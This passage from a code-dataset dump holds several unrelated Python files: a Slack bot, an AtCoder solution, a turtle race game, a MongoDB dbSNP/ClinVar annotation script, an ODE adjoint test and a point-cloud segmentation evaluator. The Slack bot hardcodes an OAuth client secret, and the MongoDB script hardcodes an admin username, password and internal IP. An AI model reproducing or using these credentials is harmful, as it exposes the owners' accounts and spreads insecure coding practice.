\"NarvalSimu\"\n self.emoji = \":robotface:\"\n\n self.oauth = {\"client_id\": \"160796522983.194115916214\",\n \"client_secret\": \"10879f8fcb356a3942c3a96a433335e0\",\n \"scope\": \"commands\"}\n self.verification = \"\"\n self.client = SlackClient(\"\")\n self.messages = {}\n\n\n def auth(self, code):\n\n auth_response = self.client.api_call(\"oauth.access\",\n client_id=self.oauth[\"client_id\"],\n client_secret=self.oauth[\"client_secret\"],\n code=code\n )\n team_id = auth_response[\"team_id\"]\n authed_teams[team_id] = {\"bot_token\":\n auth_response[\"bot\"][\"bot_access_token\"]}\n\n self.client = SlackClient(authed_teams[team_id][\"bot_token\"])","repo_name":"NeoNarval/NeoNarval","sub_path":"DRS/SRC/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15146695109","text":"from fractions import Fraction\r\n#x/y??????m?n?n/2\r\nx,y=map(int,input().split(\"/\"))\r\ni=1\r\nxdivy=Fraction(x,y)\r\nnkari=2*x//y\r\nnkari2=2*x//y+1\r\nflag=False\r\nsumkari=nkari*(nkari+1)//2\r\nsumkari2=nkari2*(nkari2+1)//2\r\n#print(xdivy)\r\nanskari1=Fraction(nkari*(nkari+1),2)-xdivy*nkari\r\nanskari2=Fraction(nkari2*(nkari2+1),2)-xdivy*nkari2\r\nflag=False\r\nif anskari1.denominator==1 and anskari1!=0 and nkari!=0:\r\n flag=True\r\n print(nkari,anskari1)\r\nif anskari2.denominator==1 and anskari2!=0 and nkari2!=0:\r\n flag=True\r\n print(nkari2,anskari2)\r\nif not flag:\r\n print(\"Impossible\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc004/C/1654778.py","file_name":"1654778.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"25807920995","text":"import turtle\nimport time \nfrom turtle import * \nimport random\n\nturtle.Screen = bgcolor(\"lightgreen\")\n\nt1 = Turtle()\nt1.penup()\nt1.shape(\"turtle\")\nt1.left(90)\nt1.speed(0)\nt1.color(\"red\")\n\n\nt2 = t1.clone()\nt2.color(\"yellow\")\n\nt3 = t1.clone()\nt3.color(\"purple\")\n\nt4 = t1.clone()\nt4.color(\"white\")\n\nt1.goto(-200, -200)\nt2.goto(160,-200)\nt3.goto(-70,-200)\nt4.goto(50,-200)\n\n\n# Finish\n\n\nfinish_1 = Turtle()\nfinish_1.penup()\nfinish_1.goto(-200,200)\nfinish_1.pendown()\nfinish_1.circle(20)\nfinish_1.hideturtle()\n\n\nfinish_2 = Turtle()\nfinish_2.penup()\nfinish_2.goto(160,200)\nfinish_2.pendown()\nfinish_2.circle(20)\nfinish_2.hideturtle()\n\n\nfinish_3 = Turtle()\nfinish_3.penup()\nfinish_3.goto(50,200)\nfinish_3.pendown()\nfinish_3.circle(20)\nfinish_3.hideturtle()\n\n\nfinish_4 = Turtle()\nfinish_4.penup()\nfinish_4.goto(-70,200)\nfinish_4.pendown()\nfinish_4.circle(20)\nfinish_4.hideturtle()\n\n\ndef main():\n for x in range(300):\n t1.fd(random.randrange(10))\n t2.fd(random.randrange(10))\n t3.fd(random.randrange(10))\n t4.fd(random.randrange(10))\n\n if (t1.position()[1]) >= 220:\n style = ('Courier', 25, 'italic')\n turtle.write('Crvena kornjača je pobjednik!', font=style, align='center')\n turtle.hideturtle()\n break\n\n elif (t2.position()[1]) >= 220:\n style = ('Courier', 25, 'italic')\n turtle.write('Žuta kornjača je pobjednik!', font=style, align='center')\n turtle.hideturtle()\n break\n\n elif (t3.position()[1]) >= 220:\n style = ('Courier', 25, 'italic')\n turtle.write('Ljubičasta kornjača je pobjednik!', font=style, align='center')\n turtle.hideturtle()\n break\n\n elif (t4.position()[1]) >= 220:\n style = ('Courier', 25, 'italic')\n turtle.write('Bijela kornjača je pobjednik!', font=style, align='center')\n turtle.hideturtle()\n break\n \n\n \nmain()\n\n\n\n\n\nturtle.mainloop()","repo_name":"AdemZecak/Turtle-Race","sub_path":"vjezba_turtle.py","file_name":"vjezba_turtle.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11554980206","text":"\n\n\nclass Methodize(object):\n\n _element = None\n \n _numbers = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten']\n \n def __init__(self, dict_):\n object.__setattr__(self, '_element', dict_)\n\n def __getattr__(self, attr):\n\n if type(self._element) is list:\n if attr in dir(list):\n return list.__getattribute__(self._element, attr)\n if attr in self._numbers:\n return self[self._numbers.index(attr)]\n if attr == 'first':\n return self[0]\n if attr == 'last':\n return self[-1]\n if type(self._element) is dict and attr in dir(dict):\n return dict.__getattribute__(self._element, attr)\n \n return self[attr]\n\n def __setattr__(self, attr, value):\n self[attr] = value\n\n def __getitem__(self, item):\n response = self._element[item]\n if type(response) in [dict, list]:\n return Methodize(response)\n else:\n return response\n\n def __setitem__(self, attr, value):\n self._element[attr] = value\n","repo_name":"nsigustavo/methodize","sub_path":"methodize.py","file_name":"methodize.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23970296094","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nfrom pymongo import MongoClient\nimport pandas as pd\n\n\ndef clinvar_required_cols(rec, cln_rec):\n rec[\"Clinvar ALLELEID\"] = cln_rec[\"ALLELEID\"] if \"ALLELEID\" in cln_rec.keys() else \"-\"\n rec[\"Clinvar CLNDN (Disease_Name)\"] = cln_rec[\"CLNDN\"] if \"CLNDN\" in cln_rec.keys() else \"-\"\n rec[\"Clinvar CLNSIG\"] = cln_rec[\"CLNSIG\"] if \"CLNSIG\" in cln_rec.keys() else \"-\"\n rec[\"Clinvar CLNREVSTAT\"] = cln_rec[\"CLNREVSTAT\"] if \"CLNREVSTAT\" in cln_rec.keys() else \"-\"\n rec[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = cln_rec[\n \"MC\"] if \"MC\" in cln_rec.keys() else \"-\"\n return rec\n\n\nclass Mongo:\n\n # used a hg19 dbSNP vcf file and same for the refGene GTF file to extract the gene\n def __init__(self, db_path=\"../../databases/00-All.vcf\",\n rs_input=\"../../databases/autism_records/input_autism-database_rsid.tsv\",\n f_input=\"/home/bioinfo3/Desktop/databases/autism_records/autism-Unannotated-records-based_rsid.tsv\",\n f2_input=\"/home/bioinfo3/Desktop/databases/autism_records/autism-database - autism_SNVchr_pos.tsv\"):\n self.unannotated_record = f_input\n self.input_file1 = f2_input\n self.input_file = rs_input\n self.client = MongoClient(\"192.168.0.155\",\n username='admin',\n password='bioinfo3')\n self.db = self.client.clinical_databases\n self.col = self.db.dbsnp\n self.cln_col = self.db.clinvar\n\n def fetch_records(self):\n with open(self.input_file, \"r\") as fh:\n dbsnp_data_hg19 = []\n dbsnp_data = []\n header = fh.readline()\n print(header)\n count = 0\n for rows in fh:\n row = rows.strip().split(\"\\t\")\n # fetch the records from the dbSNP and clinvar database based on the genes name...\n doc = self.col.find_one({\"ID\": row[0]})\n if doc is None:\n if row[2] == \"-\":\n pass\n else:\n doc = self.col.find_one({\"$and\": [{\"CHROM\": \"chr\" + row[1]}, {\"POS\": int(row[2])}]})\n if doc is None:\n dbsnp_data.append(row)\n else:\n del [doc[\"_id\"], doc[\"QUAL\"], doc[\"FILTER\"]]\n cln_rec = self.cln_col.find_one({\"$and\": [{\"CHROM\": doc[\"CHROM\"]}, {\"POS\": doc[\"POS\"]}]})\n if cln_rec is None:\n doc[\"Clinvar ALLELEID\"] = \"-\"\n doc[\"Clinvar CLNSIG\"] = \"-\"\n doc[\"Clinvar CLNDN (Disease_Name)\"] = \"-\"\n doc[\"Clinvar CLNREVSTAT\"] = \"-\"\n doc[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = \"-\"\n else:\n clinvar_required_cols(doc, cln_rec)\n dbsnp_data_hg19.append(doc)\n count += 1\n\n else:\n del [doc[\"_id\"], doc[\"QUAL\"], doc[\"FILTER\"]]\n cln_rec = self.cln_col.find_one({\"$and\": [{\"CHROM\": doc[\"CHROM\"]}, {\"POS\": doc[\"POS\"]}]})\n if cln_rec is None:\n doc[\"Clinvar ALLELEID\"] = \"-\"\n doc[\"Clinvar CLNSIG\"] = \"-\"\n doc[\"Clinvar CLNDN (Disease_Name)\"] = \"-\"\n doc[\"Clinvar CLNREVSTAT\"] = \"-\"\n doc[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = \"-\"\n else:\n clinvar_required_cols(doc, cln_rec)\n dbsnp_data_hg19.append(doc)\n count += 1\n print(count)\n df = pd.DataFrame(dbsnp_data_hg19)\n df_dropDup = df.drop_duplicates(subset=[\"ID\", \"CHROM\", \"POS\"])\n fd = pd.DataFrame(dbsnp_data)\n fd_dropDup = fd.drop_duplicates()\n df_dropDup.to_csv(\"/home/bioinfo3/Desktop/databases/autism_records/autism-annotated-records-based_rsid.tsv\",\n sep=\"\\t\", index=False)\n print(df, fd)\n fd_dropDup.to_csv(\n \"/home/bioinfo3/Desktop/databases/autism_records/autism-Unannotated-records-based_rsid.tsv\",\n sep=\"\\t\", index=False)\n\n def chr_pos(self):\n # fetch the dbsnp records using chromosomes and positions...\n with open(self.input_file1, \"r\") as fh:\n header = fh.readline().strip().split(\"\\t\")\n c = 0\n data_fetched = []\n data_ntFetch = []\n for rows in fh:\n row = rows.strip().split(\"\\t\")\n # doc = self.col.find_one({\"$and\": [{\"CHROM\": \"chr\"+row[1]}, {\"POS\": int(row[2])}]})\n # print(doc)\n if row[2] == \"-\":\n pass\n else:\n doc = self.col.find_one({\"$and\": [{\"CHROM\": \"chr\" + row[1]}, {\"POS\": int(row[2])}]})\n if doc is None:\n data_ntFetch.append(row)\n else:\n cln_rec = self.cln_col.find_one({\"$and\": [{\"CHROM\": doc[\"CHROM\"]}, {\"POS\": doc[\"POS\"]}]})\n if cln_rec is None:\n doc[\"Clinvar ALLELEID\"] = \"-\"\n doc[\"Clinvar CLNSIG\"] = \"-\"\n doc[\"Clinvar CLNDN (Disease_Name)\"] = \"-\"\n doc[\"Clinvar CLNREVSTAT\"] = \"-\"\n doc[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = \"-\"\n else:\n clinvar_required_cols(doc, cln_rec)\n del [doc[\"_id\"], doc[\"QUAL\"], doc[\"FILTER\"]]\n data_fetched.append(doc)\n df = pd.DataFrame(data_fetched)\n fd = pd.DataFrame(data_ntFetch)\n df.to_csv(\"/home/bioinfo3/Desktop/databases/autism_records/autism-database-SNVchr_pos_fetched.tsv\",\n sep=\"\\t\",\n index=False)\n fd.to_csv(\"/home/bioinfo3/Desktop/databases/autism_records/autism-database-SNVchr_pos_ntfetch.tsv\",\n sep=\"\\t\",\n index=False)\n\n\nif __name__ == \"__main__\":\n cls = Mongo()\n cls.chr_pos()\n","repo_name":"ds121/data_analysis_scripts","sub_path":"dbsnpRecords_Using_chrPosRsID.py","file_name":"dbsnpRecords_Using_chrPosRsID.py","file_ext":"py","file_size_in_byte":6566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25571018166","text":"\ntry:\n from dolfin import BackwardEuler\nexcept ImportError:\n from dolfin import info_red\n info_red(\"Need dolfin > 1.2.0 for ode_solver test.\")\n import sys; sys.exit(0)\n\nfrom dolfin import *\nfrom dolfin_adjoint import *\n\nif not hasattr(MultiStageScheme, \"to_tlm\"):\n info_red(\"Need dolfin > 1.2.0 for ode_solver test.\")\n import sys; sys.exit(0)\n\nmesh = UnitIntervalMesh(1)\n#R = FunctionSpace(mesh, \"R\", 0) # in my opinion, should work, but doesn't\nR = FunctionSpace(mesh, \"CG\", 1)\n\ndef main(u, form, time, Solver, dt):\n\n scheme = Solver(form, u, time)\n scheme.t().assign(float(time))\n\n xs = [float(time)]\n ys = [u.vector().array()[0]]\n\n solver = PointIntegralSolver(scheme)\n solver.parameters.reset_stage_solutions = True\n solver.parameters.newton_solver.reset_each_step = True\n\n for i in range(int(0.2/dt)):\n solver.step(dt)\n xs.append(float(time))\n ys.append(u.vector().array()[0])\n\n return (u, xs, ys)\n\nif __name__ == \"__main__\":\n u0 = interpolate(Constant(1.0), R, name=\"InitialValue\")\n c_f = 1.0\n c = interpolate(Constant(1.0), R, name=\"GrowthRate\")\n Solver = RK4\n\n u = u0.copy(deepcopy=True, name=\"Solution\")\n v = TestFunction(R)\n time = Constant(0.0)\n # FIXME: make this work in the forward code:\n #expr = Expression(\"t\", t=time)\n #form = inner(expr(u, v)*dP\n form = lambda u, time: inner(time*u, v)*dP\n exact_u = lambda t: exp(t*t/2.0)\n #form = lambda u, time: inner(u, v)*dP\n #exact_u = lambda t: exp(t)\n\n ## Step 0. Check forward order-of-convergence (nothing to do with adjoints)\n check = False\n plot = False\n\n if check:\n if plot:\n import matplotlib.pyplot as plt\n\n dts = [0.1, 0.05, 0.025]\n\n errors = []\n for dt in dts:\n u.assign(u0)\n time.assign(0.0)\n adj_reset()\n (u, xs, ys) = main(u, form(u, time), time, Solver, dt=dt)\n\n exact_ys = [exact_u(t) for t in xs]\n errors.append(abs(ys[-1] - exact_ys[-1]))\n\n if plot:\n plt.plot(xs, ys, label=\"Approximate solution (dt %s)\" % dt)\n if dt == dts[-1]:\n plt.plot(xs, exact_ys, label=\"Exact solution\")\n\n print(\"Errors: \", errors)\n print(\"Convergence order: \", convergence_order(errors))\n\n assert min(convergence_order(errors)) > 0.8\n\n if plot:\n plt.legend(loc=\"best\")\n plt.show()\n else:\n dt = 0.1\n (u, xs, ys) = main(u, form(u, time), time, Solver, dt=dt)\n print(\"Solution: \", ys[-1])\n\n ## Step 1. Check replay correctness\n\n replay = True\n if replay:\n assert adjglobals.adjointer.equation_count > 0\n adj_html(\"forward.html\", \"forward\")\n success = replay_dolfin(tol=1.0e-15, stop=True)\n assert success\n\n ## Step 2. Check TLM correctness\n\n dtm = TimeMeasure()\n J = Functional(inner(u, u)*dx*dtm[FINISH_TIME])\n m = Control(u)\n assert m.tape_value().vector()[0] == u0.vector()[0]\n Jm = assemble(inner(u, u)*dx)\n\n def Jhat(ic):\n time = Constant(0.0)\n (u, xs, ys) = main(ic, form(ic, time), time, Solver, dt=dt)\n print(\"Perturbed functional value: \", assemble(inner(u, u)*dx))\n return assemble(inner(u, u)*dx)\n\n dJdm = compute_gradient_tlm(J, m, forget=False)\n minconv_tlm = taylor_test(Jhat, m, Jm, dJdm, perturbation_direction=interpolate(Constant(1.0), R), seed=1.0)\n assert minconv_tlm > 1.8\n\n ## Step 3. Check ADM correctness\n\n dJdm = compute_gradient(J, m, forget=False)\n minconv_adm = taylor_test(Jhat, m, Jm, dJdm, perturbation_direction=interpolate(Constant(1.0), R), seed=1.0)\n assert minconv_adm > 1.8\n","repo_name":"dolfin-adjoint/pyadjoint","sub_path":"tests/migration/ode_solver/ode_solver.py","file_name":"ode_solver.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"72"} +{"seq_id":"43580573641","text":"import os\nimport time\nimport random\nimport numpy as np\nimport argparse\nimport shutil\nimport time\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\nfrom functools import partial\nfrom tensorboardX import SummaryWriter\n\nfrom pointseg.datasets import build_dataset\nfrom pointseg.model import build_model\nfrom pointseg.utils.misc import AverageMeter, intersection_and_union_gpu, find_free_port, make_dirs\nfrom pointseg.datasets.utils import collate_fn, point_collate_fn\nfrom pointseg.utils.optimizer import build_optimizer\nfrom pointseg.utils.scheduler import build_scheduler\nfrom pointseg.utils.losses import build_criteria\nfrom pointseg.utils.config import Config, DictAction\nfrom pointseg.utils.logger import get_root_logger\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='PyTorch Point Cloud Semantic Segmentation')\n parser.add_argument('config',\n type=str,\n default='configs/s3dis/ptv2-base-1.py',\n help='config file')\n parser.add_argument('--options', nargs='+', action=DictAction, help='custom options')\n args = parser.parse_args()\n return args\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n cudnn.benchmark = False\n cudnn.deterministic = True\n\n\ndef worker_init_fn(worker_id, num_workers, rank, seed):\n \"\"\"Worker init func for dataloader.\n\n The seed of each worker equals to num_worker * rank + worker_id + user_seed\n\n Args:\n worker_id (int): Worker id.\n num_workers (int): Number of workers.\n rank (int): The rank of current process.\n seed (int): The random seed to use.\n \"\"\"\n\n worker_seed = num_workers * rank + worker_id + seed\n set_seed(worker_seed)\n\n\ndef main_process(cfg):\n return not cfg.multiprocessing_distributed or (\n cfg.multiprocessing_distributed and cfg.rank % cfg.num_gpus_per_node == 0)\n\n\ndef main():\n args = get_parser()\n\n cfg = Config.fromfile(args.config)\n if args.options is not None:\n cfg.merge_from_dict(args.options)\n\n if cfg.train_gpu is None:\n cfg.train_gpu = [int(i) for i in range(torch.cuda.device_count())]\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(str(x) for x in cfg.train_gpu)\n\n if cfg.seed is None:\n cfg.seed = random.randint(0, 2 ** 16)\n\n set_seed(cfg.seed)\n\n if cfg.dist_url == \"env://\" and cfg.world_size == -1:\n cfg.world_size = int(os.environ[\"WORLD_SIZE\"])\n\n cfg.distributed = cfg.world_size > 1 or cfg.multiprocessing_distributed\n cfg.num_gpus_per_node = len(cfg.train_gpu)\n if len(cfg.train_gpu) == 1:\n cfg.sync_bn = False\n cfg.distributed = False\n cfg.multiprocessing_distributed = False\n\n make_dirs(cfg.save_path)\n cfg.dump(os.path.join(cfg.save_path, \"config.py\"))\n\n if cfg.cache_data:\n build_dataset(cfg.data.train)\n build_dataset(cfg.data.val)\n\n if cfg.multiprocessing_distributed:\n port = find_free_port()\n cfg.dist_url = f\"tcp://localhost:{port}\"\n cfg.world_size = cfg.num_gpus_per_node * cfg.world_size\n mp.spawn(main_worker, nprocs=cfg.num_gpus_per_node, args=(cfg.num_gpus_per_node, cfg))\n else:\n main_worker(cfg.train_gpu, cfg.num_gpus_per_node, cfg)\n\n\ndef main_worker(gpu, num_gpus_per_node, cfg):\n best_metric = 0\n if cfg.distributed:\n if cfg.dist_url == \"env://\" and cfg.rank == -1:\n cfg.rank = int(os.environ[\"RANK\"])\n if cfg.multiprocessing_distributed:\n cfg.rank = cfg.rank * num_gpus_per_node + gpu\n dist.init_process_group(backend=cfg.dist_backend,\n init_method=cfg.dist_url,\n world_size=cfg.world_size,\n rank=cfg.rank)\n\n logger = get_root_logger(log_file=os.path.join(cfg.save_path, \"train.log\"), file_mode='a' if cfg.resume else 'w')\n logger.info(f\"Config:\\n{cfg.pretty_text}\")\n\n if cfg.seed is not None:\n seed = cfg.workers * cfg.rank + cfg.seed\n set_seed(seed)\n\n # build model\n logger.info(\"=> Creating model ...\")\n model = build_model(cfg.model)\n if cfg.sync_bn:\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\n n_parameters = sum(p.numel() for p in model.parameters() if p.requires_grad)\n logger.info(\"Number params: {}\".format(n_parameters))\n logger.info(\"Num classes: {}\".format(cfg.data.num_classes))\n\n writer = None\n if main_process(cfg):\n writer = SummaryWriter(cfg.save_path)\n\n if cfg.distributed:\n torch.cuda.set_device(gpu)\n cfg.batch_size = int(cfg.batch_size / num_gpus_per_node)\n cfg.batch_size_val = int(cfg.batch_size_val / num_gpus_per_node)\n cfg.workers = int((cfg.workers + num_gpus_per_node - 1) / num_gpus_per_node)\n model = torch.nn.parallel.DistributedDataParallel(\n model.cuda(),\n device_ids=[gpu],\n find_unused_parameters= False #True #cfg.find_unused_parameters\n )\n\n else:\n model = torch.nn.DataParallel(model.cuda())\n\n # build dataset & dataloader\n logger.info(\"=> Creating dataset & dataloader ...\")\n train_data = build_dataset(cfg.data.train)\n\n if cfg.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)\n else:\n train_sampler = None\n\n init_fn = partial(\n worker_init_fn, num_workers=cfg.workers, rank=cfg.rank,\n seed=cfg.seed) if cfg.seed is not None else None\n\n train_loader = torch.utils.data.DataLoader(train_data,\n batch_size=cfg.batch_size,\n shuffle=(train_sampler is None),\n num_workers=cfg.workers,\n sampler=train_sampler,\n collate_fn=partial(point_collate_fn,\n max_batch_points=cfg.max_batch_points,\n mix_prob=cfg.mix_prob\n ),\n pin_memory=True,\n worker_init_fn=init_fn,\n drop_last=True,\n persistent_workers=True)\n\n val_loader = None\n if cfg.evaluate:\n val_data = build_dataset(cfg.data.val)\n if cfg.distributed:\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_data)\n else:\n val_sampler = None\n val_loader = torch.utils.data.DataLoader(val_data,\n batch_size=cfg.batch_size_val,\n shuffle=False,\n num_workers=cfg.workers,\n pin_memory=True,\n sampler=val_sampler,\n collate_fn=collate_fn)\n\n # Build criteria, optimize, scheduler\n logger.info(\"=> Creating criteria, optimize, scheduler, scaler(amp) ...\")\n criteria = build_criteria(cfg.criteria)\n optimizer = build_optimizer(cfg.optimizer, model, cfg.param_dicts)\n cfg.scheduler.steps_per_epoch = len(train_loader)\n scheduler = build_scheduler(cfg.scheduler, optimizer)\n logger.info(\"Update steps_per_epoch to {}\".format(cfg.scheduler.steps_per_epoch))\n scaler = torch.cuda.amp.GradScaler() if cfg.enable_amp else None\n\n logger.info(\"=> Checking weight & resume ...\")\n resume_weight = ''\n logger.info(\"=> loading checkpoint '{}'\".format(resume_weight))\n checkpoint = torch.load(resume_weight, map_location=lambda storage, loc: storage.cuda())\n cfg.start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'], strict=True)\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(resume_weight, checkpoint['epoch']))\n\n for epoch in range(1):\n epoch_log = 0\n\n is_best = False\n \n if cfg.evaluate and (epoch_log % cfg.eval_freq == 0):\n loss_val, mIoU_val, mAcc_val, allAcc_val = \\\n validate(cfg, val_loader, model, criteria)\n current_metrics = dict(mIoU=mIoU_val, mAcc=mAcc_val, allAcc=allAcc_val) # register metrics\n\n logger.info('==>Evaluation done!\\nBest {}: {:.4f}'.format(cfg.metric, best_metric))\n if writer is not None:\n writer.close()\n\n\ndef validate(cfg, val_loader, model, criteria):\n logger = get_root_logger()\n logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')\n batch_time = AverageMeter()\n data_time = AverageMeter()\n loss_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n target_meter = AverageMeter()\n \n mh_weight = 1\n mh_dic = [19, -1, -1, 24, 23, 21, 20, 22]\n mh_dic_add = [0, 3, 4, 5, 6, 7]\n \n model.eval()\n end = time.time()\n for i, input_dict in enumerate(val_loader):\n data_time.update(time.time() - end)\n for key in input_dict.keys():\n if key != \"data_metas\":\n input_dict[key] = input_dict[key].cuda(non_blocking=True)\n coord = input_dict[\"coord\"]\n feat = input_dict[\"feat\"]\n target = input_dict[\"label\"]\n offset = input_dict[\"offset\"]\n mh = False\n \n with torch.no_grad():\n outputs = model(input_dict)\n\n\n if isinstance(outputs, tuple):\n mh = True\n outputs_c, outputs_b = outputs\n else:\n outputs_c = outputs\n if mh:\n targets_c = input_dict['label_c']\n targets_b = input_dict['label_b']\n if outputs_c.requires_grad:\n loss = criteria(outputs_c, targets_c) + mh_weight * criteria(outputs_b, targets_b)\n else:\n loss = criteria(outputs_c, targets_c)\n else:\n loss = criteria(outputs_c, target)\n\n if mh:\n output = outputs_c.max(1)[1]\n output_b = outputs_b.max(1)[1]\n for i_cat in range(6):\n output[np.logical_and((output == mh_dic_add[i_cat]).cpu().numpy(), (output_b == 1).cpu().numpy())] = mh_dic[mh_dic_add[i_cat]]\n else:\n output = outputs.max(1)[1]\n \n n = coord.size(0)\n if cfg.multiprocessing_distributed:\n loss *= n\n count = target.new_tensor([n], dtype=torch.long)\n dist.all_reduce(loss), dist.all_reduce(count)\n n = count.item()\n loss /= n\n\n # For fairness\n cur_length_point = input_dict['length'].data.cpu().numpy()\n cur_length_voxel = input_dict['count'].data.cpu().numpy()\n output1 = output[:cur_length_voxel[0]]\n cur_inverse_1 = input_dict['inverse'].data.cpu().numpy()[:cur_length_point[0]]\n main_points_1 = input_dict['main_num'].data.cpu().numpy()[0]\n output2 = output1[cur_inverse_1][:main_points_1]\n target2 = input_dict['main_label']\n\n intersection, union, target = \\\n intersection_and_union_gpu(output2, target2, cfg.data.num_classes, cfg.data.ignore_label)\n if cfg.multiprocessing_distributed:\n dist.all_reduce(intersection)\n dist.all_reduce(union)\n dist.all_reduce(target)\n intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()\n intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)\n\n accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)\n loss_meter.update(loss.item(), n)\n batch_time.update(time.time() - end)\n end = time.time()\n if (i + 1) % cfg.log_freq == 0:\n logger.info('Test: [{}/{}] '\n 'Data {data_time.val:.3f} ({data_time.avg:.3f}) '\n 'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '\n 'Loss {loss_meter.val:.4f} ({loss_meter.avg:.4f}) '\n 'Accuracy {accuracy:.4f}.'.format(i + 1, len(val_loader),\n data_time=data_time,\n batch_time=batch_time,\n loss_meter=loss_meter,\n accuracy=accuracy))\n\n iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)\n accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)\n mIoU = np.mean(iou_class)\n mAcc = np.mean(accuracy_class)\n allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)\n logger.info('Val result: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc))\n for i in range(cfg.data.num_classes):\n logger.info('Class_{idx}-{name} Result: iou/accuracy {iou:.4f}/{accuracy:.4f}'.format(\n idx=i, name=cfg.data.names[i], iou=iou_class[i], accuracy=accuracy_class[i]))\n logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')\n return loss_meter.avg, mIoU, mAcc, allAcc\n\n\nif __name__ == '__main__':\n import gc\n\n gc.collect()\n main()\n","repo_name":"CVMI-Lab/MarS3D","sub_path":"tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13693,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"29585232631","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom scipy import stats\nfrom argparse import ArgumentParser\nfrom utils import sort_timestamps, remove_surgery_patients, str2datetime,\\\n get_earliest_timestamp, get_last_timestamp, BCa_interval\n\n\ndef margins_of_error(data_path:str=None):\n data = pd.read_csv(os.path.join(data_path, \"interrater_variability_study.csv\"))\n\n raw = data[\"Raw volume\"]\n per = data[\"Per volume\"]\n\n error = np.abs(per - raw) / raw\n\n print(np.median(error), stats.iqr(error))\n print(np.mean(error), np.std(error))\n\n # find quantiles based data\n ci, theta_hat = BCa_interval(\n np.asarray(error), func=lambda x: np.mean(x), B=10000, q=0.975\n )\n\n print(ci)\n\n\ndef preprocess(data_path:str=None, remove_surgery:bool=False, export_csv:bool=False, remove_missing:bool=False, remove_multifocal:bool=False):\n cohort_personal_info = pd.read_csv(os.path.join(data_path, \"cohort_personal_info.csv\"))\n cohort_volumes_quality = pd.read_csv(os.path.join(data_path, \"cohort_volumes_quality-filtered.csv\"))\n volumes = pd.read_csv(os.path.join(data_path, \"volumes.csv\"))\n t2_oedema = pd.read_csv(os.path.join(data_path, \"T2_and_peritumorial_oedema.csv\"), sep=\";\")\n scanner_info = pd.read_csv(os.path.join(data_path, \"scanners_info.csv\"), sep=\",\")\n\n # get unique patients\n patients = cohort_personal_info[\"Patient\"]\n\n if remove_surgery:\n print(\"Filtering patients who underwent surgery...\")\n # remove all patients that have had surgery\n patients_no_surgery, patient_filter = remove_surgery_patients(patients)\n\n # filter other datasets by selected patients\n cohort_personal_info_filtered = cohort_personal_info[patient_filter]\n\n filter_ = [x in patients_no_surgery for x in cohort_volumes_quality[\"Patient\"]]\n filtered_cohort_volumes_quality = cohort_volumes_quality[filter_]\n\n filter_ = [x in patients_no_surgery for x in volumes[\"OP_ID\"]]\n filtered_volumes = volumes[filter_]\n\n filter_ = [x in patients_no_surgery for x in t2_oedema[\"Patient\"]]\n filtered_t2_oedema = t2_oedema[filter_]\n\n del patient_filter # to avoid using this variable by accident for something else later\n\n else:\n print(\"Keeping patients who underwent surgery...\")\n cohort_personal_info_filtered = cohort_personal_info.copy()\n filtered_cohort_volumes_quality = cohort_volumes_quality.copy()\n filtered_volumes = volumes.copy()\n filtered_t2_oedema = t2_oedema.copy()\n\n # 1) First assumption (lets sum all fragmented tumors together into one - total tumor volume in patient,\n # for each time point). Use cohort volumes quality to catch all patients and time points\n data = []\n unique_patients = np.asarray(filtered_volumes[\"OP_ID\"].drop_duplicates())\n print(\"Number of unique patients originally:\", len(unique_patients))\n\n iter = 0\n for pat in tqdm(unique_patients, \"Extracting volume info per patient\"):\n # get all data for current patient\n curr_data = filtered_volumes[filtered_volumes[\"OP_ID\"] == 